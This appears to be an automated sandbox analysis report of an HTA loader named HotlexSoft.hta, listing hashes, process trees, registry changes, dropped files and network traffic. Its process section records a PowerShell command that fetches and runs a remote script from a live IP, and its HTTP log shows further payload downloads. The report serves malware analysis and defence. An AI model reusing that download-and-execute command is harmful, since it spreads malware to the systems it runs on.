File name: HotlexSoft.hta

Full analysis: https://app.any.run/tasks/59be9f4e-84d4-49a4-ad9b-11774727909a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 29, 2023, 18:11:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: opendir, loader
Indicators:
MIME: text/html
File info: HTML document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5: E78E6E811435E6EFA0BC9B729925F022
SHA1: 6BAD7E843190D41B5E11CDCDE33F36D0A5999F14
SHA256: 871B52FFB40446AD5C7B43DE9AA7BFA9C1878654964ECDC65336AE0EA9F9186E
SSDEEP: 384:AijroQqaAgRYhyiOJo40gw38yy+662qSk0QvubGDb7/HyiPZuN49fnew2fwSWX2m:Aiv5qaYdKiV3iPuPyk9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses base64 encoding (SCRIPT)

      • mshta.exe (PID: 2040)
    • Starts Visual C# compiler

      • powershell.exe (PID: 2076)
  • SUSPICIOUS

    • Creates XML DOM element (SCRIPT)

      • mshta.exe (PID: 2040)
    • Reads the Internet Settings

      • mshta.exe (PID: 2040)
      • powershell.exe (PID: 2076)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • mshta.exe (PID: 2040)
    • Sets XML DOM element text (SCRIPT)

      • mshta.exe (PID: 2040)
    • Reads data from a binary Stream object (SCRIPT)

      • mshta.exe (PID: 2040)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 2040)
    • Changes charset (SCRIPT)

      • mshta.exe (PID: 2040)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 2040)
    • Found IP address in command line

      • powershell.exe (PID: 2076)
    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 2040)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 2040)
    • Uses .NET C# to load dll

      • powershell.exe (PID: 2076)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 2040)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2040)
    • Checks supported languages

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)
      • RegAsm.exe (PID: 1840)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)
    • Create files in a temporary directory

      • csc.exe (PID: 1588)
      • cvtres.exe (PID: 572)
    • Drops the executable file immediately after the start

      • csc.exe (PID: 1588)
    • Connects to the server without a host name

      • powershell.exe (PID: 2076)
    • Unusual connection from system programs

      • powershell.exe (PID: 2076)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)

EXIF

HTML

ContentType: text/html; charset=UTF-8
Viewport: width=device-width, initial-scale=1.0
Title: PHP: ZipArchive::setCompressionIndex - Manual
No data.
All screenshots are available in the full report
Total processes: 40
Monitored processes: 5
Malicious processes: 1
Suspicious processes: 1

Behavior graph

Processes shown in the graph: mshta.exe, powershell.exe, csc.exe, cvtres.exe, regasm.exe

Process information

PID: 572
CMD: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESFB29.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8CD89968CAE54B2F82D36F4A2C196620.TMP"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Parent process: csc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.10.25028.0 built by: VCTOOLSD15RTM
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140_clr0400.dll
c:\windows\system32\ucrtbase_clr0400.dll
PID: 1588
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\5iovyj4n.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.3761.0 built by: NET48REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140_clr0400.dll
c:\windows\system32\ucrtbase_clr0400.dll
PID: 1840
CMD: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
3221225477
Version:
4.8.3761.0 built by: NET48REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
PID: 2040
CMD: "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\HotlexSoft.hta"
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
PID: 2076
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm http://193.124.33.148/k/test.txt | iex
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events: 3 339
Read events: 3 273
Write events: 66
Delete events: 0

Modification events

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation: write
Name: ProxyEnable
Value: 0

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation: write
Name: SavedLegacySettings
Value: 460000005B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (2040) mshta.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (2076) powershell.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write
Name: LanguageList
Value: en-US
Executable files: 1
Suspicious files: 8
Text files: 3
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\5iovyj4n.cmdline | text
MD5: C05E263274D7183C1E73DEB3F12644D0
SHA256: B12FC77336A8DE8717624330DD99732F954C3B66E81CF1F2D171B45A765EDD60
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
MD5: F500255BDC0DD45A0934243E38529D10
SHA256: AD4304402753CEF71770C63692428001309617BDA00D87E229D197721D29496E
1588 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC8CD89968CAE54B2F82D36F4A2C196620.TMP | binary
MD5: 8E69A034AB2D3AF870A41C176D92FDCF
SHA256: FBB7581400AF359D38FD8546A024A8F16FA518192C76841EEB147268EF36922B
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFdf780.TMP | binary
MD5: 0268C3470C936E6FBAC2945B9E1C2099
SHA256: DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ef1sc3f2.00h.psm1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\kc3l3zzb.114.ps1 | binary
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
2076 | powershell.exe | C:\Users\admin\AppData\Local\Temp\5iovyj4n.0.cs | text
MD5: 02F8589FCD6E664F168F7969939D2EE8
SHA256: 79ECF2D105B7359CB7E4239597DE77A5A10A7DB77BB2E4320F0F00BBCB03389F
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BQ8ZQ9L10SIQMJSW4E2W.temp | binary
MD5: F500255BDC0DD45A0934243E38529D10
SHA256: AD4304402753CEF71770C63692428001309617BDA00D87E229D197721D29496E
572 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESFB29.tmp | binary
MD5: B6A610F655CA0794E1A395B0A2B515F7
SHA256: F30306156BADDEE1EC739C9E1504DB782CC8B89ED00B8CAE6CDB297553A60FA8
1588 | csc.exe | C:\Users\admin\AppData\Local\Temp\5iovyj4n.dll | executable
MD5: 29D981FD26678A3995B76FD9984D1569
SHA256: D30EC7BFBCC6AEE561CFE16EFCCC5DE10E15943BA273F0D778E58F7B953F93D2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 6
DNS requests: 1
Threats: 10

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2076 | powershell.exe | GET | 200 | 193.124.33.148:80 | http://193.124.33.148/k/test.txt | unknown | text | 645 b | unknown
2076 | powershell.exe | GET | 200 | 193.124.33.148:80 | http://193.124.33.148/k/loadtobadxml.exe | unknown | executable | 6.00 Kb | unknown
2076 | powershell.exe | GET | 200 | 193.124.33.148:80 | http://193.124.33.148/k/payload.bin | unknown | binary | 2.38 Mb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
1080 | svchost.exe | 224.0.0.252:5355 | | | | unknown
4 | System | 192.168.100.255:138 | | | | whitelisted
2076 | powershell.exe | 193.124.33.148:80 | | | RU | unknown

DNS requests

Domain | IP | Reputation
dns.msftncsi.com | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
2076 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
2076 | powershell.exe | Potential Corporate Privacy Violation | AV POLICY HTTP request for .exe file with no User-Agent
2076 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host
2076 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2076 | powershell.exe | Misc activity | ET HUNTING Suspicious Windows Executable WriteProcessMemory
2076 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2076 | powershell.exe | Misc activity | ET HUNTING Suspicious Windows Executable CreateRemoteThread
2076 | powershell.exe | Potentially Bad Traffic | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
2 ETPRO signatures available at the full report
No debug info